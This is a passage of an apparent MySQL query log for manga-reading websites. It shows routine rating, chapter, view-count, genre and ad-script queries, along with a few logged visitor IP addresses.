average_rating FROM ratings where manga_id = '319' order by created desc 330655630 Quit 330655631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330655631 Quit 330655632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330655632 Quit 330655633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330655633 Quit 330655634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330655634 Quit 330655635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330655635 Quit 330655636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330655636 Quit 330655637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330655637 Quit 330655638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330655638 Quit 330655639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330655639 Quit 330655640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330655640 Quit 330655641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330655641 Quit 330655642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330655642 Quit 330655643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330655643 Quit 330655644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330655644 Quit 330655645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330655645 Quit 330655646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330655646 Quit 330655647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330655647 Quit 330655648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330655648 Quit 330655649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330655649 Quit 330655650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330655650 Quit 330655651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330655651 Quit 330655652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330655652 Quit 330655653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330655653 Quit 330655654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330655654 Quit 330655655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330655655 Quit 330655656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330655656 Quit 330655657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330655657 Quit 330655658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330655658 Quit 330655659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330655659 Quit 330655660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330655660 Quit 330655661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330655661 Quit 330655662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330655662 Quit 330655663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330655663 Quit 330655664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330655664 Quit 330655665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330655665 Quit 330655666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330655666 Quit 330655667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330655667 Quit 330655668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330655668 Quit 330655669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330655669 Quit 330655670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330655670 Quit 330655671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330655671 Quit 330655672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330655672 Quit 330655673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330655673 Quit 330655674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330655674 Quit 330655675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330655675 Quit 330655676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330655676 Quit 330655677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330655677 Quit 330655678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330655678 Quit 330655679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330655679 Quit 330655680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330655680 Quit 330655681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330655681 Quit 330655682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330655682 Quit 330655683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330655683 Quit 330655684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330655684 Quit 330655685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330655685 Quit 330655686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330655686 Quit 330655687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330655687 Quit 330655688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330655688 Quit 330655689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330655689 Quit 330655690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330655690 Quit 330655691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330655691 Quit 330655692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330655692 Quit 330655693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330655693 Quit 330655694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330655694 Quit 330655695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330655695 Quit 330655696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330655696 Quit 330655697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330655697 Quit 330655698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330655698 Quit 330655699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330655699 Quit 330655700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330655700 Quit 330655701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330655701 Quit 330655702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330655702 Quit 330655703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330655703 Quit 330655704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330655704 Quit 330655705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330655705 Quit 330655706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330655706 Quit 330655707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330655708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330655708 Quit 330655709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330655707 Quit 330655709 Quit 330655710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655710 Quit 330655711 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655711 Quit 330655712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655712 Quit 330655713 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330655713 Quit 330655714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655714 Quit 330655715 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id) group by r.manga_id) as k ORDER BY RAND() DESC limit 10 330655716 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655717 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655716 Quit 330655717 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7998' 330655717 Quit 330655718 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655718 Query select * FROM chapters where id = '7998' 330655718 Quit 330655719 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655719 Query select * FROM chapters where manga_id = '193' order by id desc 330655719 Quit 330655720 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655720 Query Update chapters set view=view+1 where id = '7998' 330655720 Quit 330655721 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655721 Query select * FROM chapters where id = '7998' 330655722 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655721 Quit 330655722 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '7998' 330655722 Quit 330655723 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655723 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, created, modified) VALUES ('193', '7998', '82.132.212.73', '2026-02-26 03:29:43', '2026-02-26 03:29:43') 330655723 Quit 330655724 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655724 Query select * FROM chapter_images where chapter_id = '7998' 330655724 Quit 330655725 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655726 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655725 Quit 330655726 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330655726 Quit 330655727 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655727 Query select * FROM chapters where manga_id = '193' order by id desc 330655727 Quit 330655728 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655729 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655729 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655728 Quit 330655729 Quit 330655577 Quit 330655730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655731 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330655730 Quit 330655731 Quit 330655732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655732 Quit 330655733 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655733 Quit 330655734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655734 Quit 330655735 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655735 Quit 330655736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655736 Quit 330655737 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655737 Quit 330655738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655738 Quit 330655739 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330655739 Quit 330655740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655740 Query select * FROM chapters where id = '2791' 330655740 Quit 330655741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655741 Query select * FROM chapters where manga_id = '27' order by id desc 330655741 Quit 330655742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655742 Query Update chapters set view=view+1 where id = '2791' 330655742 Quit 330655743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655743 Query select * FROM chapters where id = '2791' 330655743 Quit 330655744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655744 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '2791' 330655744 Quit 330655745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655745 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('27', '2791', '103.151.74.181', 'mangacherri.com', '2026-02-26 03:29:43', '2026-02-26 03:29:43') 330655745 Quit 330655746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655746 Query select * FROM chapter_images where chapter_id = '2791' 330655746 Quit 330655747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655747 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '27' and m.active = 1 330655748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655748 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='27' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330655747 Quit 260225 19:29:44 330655749 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655750 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655749 Quit 330655750 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5475' and m.active = 1 330655750 Quit 330655751 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655751 Query select * FROM chapters where id = '5475' 330655751 Quit 330655752 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655752 Query select * FROM chapters where manga_id = '149' order by display_priority ASC, id desc 330655752 Quit 330655753 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655753 Query Update chapters set view=view+1 where id = '5475' 330655753 Quit 330655754 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655754 Query select * FROM chapters where id = '5475' 330655754 Quit 330655755 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655755 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '5475' and m.active = 1 330655755 Quit 330655756 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655756 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('149', '5475', '204.137.100.1', 'mangaberri.com', '2026-02-26 03:29:44', '2026-02-26 03:29:44') 330655756 Quit 330655757 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655757 Query select * FROM chapter_images where chapter_id = '5475' 330655757 Quit 330655758 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655758 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '149' and m.active = 1 330655758 Quit 330655759 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655759 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='149' and m.active = 1 AND (genres like '%Action%' OR genres like '%Adventure%' OR genres like '%Drama%' OR genres like '%Horror%' OR genres like '%Psychological%' OR genres like '%Romance%' OR genres like '%Sci-Fi%') ORDER BY RAND() limit 10 330655759 Quit 330655760 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655761 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655760 Quit 330655761 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330655761 Quit 330655762 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655763 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655762 Quit 330655763 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655763 Quit 330655764 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655765 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655764 Quit 330655765 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655765 Quit 330655766 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655767 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330655766 Quit 330655767 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655767 Quit 330655715 Quit 330655768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655768 Query select max(c.id) as chapter_id, m.* from chapters as c join mangas as m on (m.id = c.manga_id) where m.active = 1 group by m.id order by chapter_id desc limit 30 330655768 Quit 330655769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655769 Query SELECT stats.total_view, stats.latest_chapter_id, latest_chapter.name AS latest_chapter, m.* FROM ( SELECT c.manga_id, SUM(c.view) AS total_view, MAX(c.id) AS latest_chapter_id FROM chapters AS c GROUP BY c.manga_id ) AS stats JOIN chapters AS latest_chapter ON latest_chapter.id = stats.latest_chapter_id JOIN mangas AS m ON m.id = stats.manga_id WHERE m.active = 1 ORDER BY stats.total_view DESC 330655769 Quit 330655770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655770 Query select k.* from (select m.*, count(r.id) as total_rating, (sum(r.rating) / count(r.id)) as average_rating, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM ratings as r join mangas as m on (m.id = r.manga_id AND m.status = 'Finished') group by r.manga_id) as k ORDER BY k.id DESC 330655748 Quit 330655771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655771 Quit 330655772 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330655772 Quit 330655773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655773 Quit 330655774 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655774 Quit 330655775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655775 Quit 330655776 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655776 Quit 330655777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655777 Quit 330655778 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330655778 Quit 330655770 Quit 330655779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655779 Quit 330655780 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330655780 Quit 330655781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330655781 Quit 330655782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330655782 Quit 330655783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330655783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330655783 Quit 330655784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 